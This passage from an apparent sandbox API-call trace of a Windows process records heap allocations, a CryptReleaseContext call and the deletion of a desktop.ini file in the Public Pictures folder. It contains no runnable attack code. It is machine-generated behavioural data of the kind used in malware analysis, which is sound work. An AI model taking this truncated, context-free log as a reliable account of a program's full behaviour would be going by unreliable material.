lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0224.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7160, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0224.251] CryptReleaseContext (hProv=0xa7c550, dwFlags=0x0) returned 1 [0224.251] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.251] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.252] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.252] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.252] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.252] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.252] FreeLibrary (hLibModule=0x76390000) returned 1 [0224.252] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.252] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.252] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.252] CloseHandle (hObject=0x520) returned 1 [0224.254] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.254] CloseHandle (hObject=0x4e0) returned 1 [0224.256] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.256] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.256] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\Public\\Pictures\\desktop.ini", lpFilePart=0x8cedf4*="desktop.ini") returned 0x24 [0224.256] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini")) returned 0x26 [0224.256] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x8cf060, dwReserved1=0x413764, cFileName="desktop.ini", cAlternateFileName="")) returned 0x9e2078 [0224.256] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini")) returned 1 [0224.260] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x8cf060, dwReserved1=0x413764, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0224.260] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0224.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0224.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0224.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0224.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0224.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0224.261] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0224.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0224.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0224.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0224.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0224.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0224.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0224.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0224.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0224.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0224.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0224.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0224.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0224.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x29f7878 [0224.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0224.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0224.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0224.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0224.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0224.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0224.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0224.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0224.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0224.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0224.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0224.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0224.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0224.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0224.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0224.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4a) returned 0x29eb058 [0224.263] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\Public\\Pictures\\desktop.ini", lpFilePart=0x8cf650*="desktop.ini") returned 0x24 [0224.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb058 | out: hHeap=0x2af0000) returned 1 [0224.263] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini")) returned 0xffffffff [0224.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0224.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0224.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0224.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0224.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0224.263] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0224.263] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0224.263] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0224.263] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0224.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0224.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0224.263] CharUpperBuffW (in: lpsz="A5700E02918", cchLength=0xb | out: lpsz="A5700E02918") returned 0xb [0224.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0224.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0224.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a58 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0224.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab248 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0224.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0224.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0224.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0224.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0224.265] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0224.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0224.265] CharUpperBuffW (in: lpsz="SSA5700E02918", cchLength=0xd | out: lpsz="SSA5700E02918") returned 0xd [0224.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0224.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0224.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0224.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0224.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0224.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0224.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0224.266] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0224.266] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0224.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0224.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0224.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0224.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0224.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0224.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0224.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0224.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0224.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0224.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0224.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0224.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0224.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0224.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0224.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0224.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0224.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0224.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0224.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0224.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0224.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0224.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0224.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0224.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0224.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0224.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0224.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0224.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0224.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0224.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0224.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0224.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0224.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0224.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0224.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0224.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0224.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0224.268] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0224.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0224.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0224.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0224.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0224.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 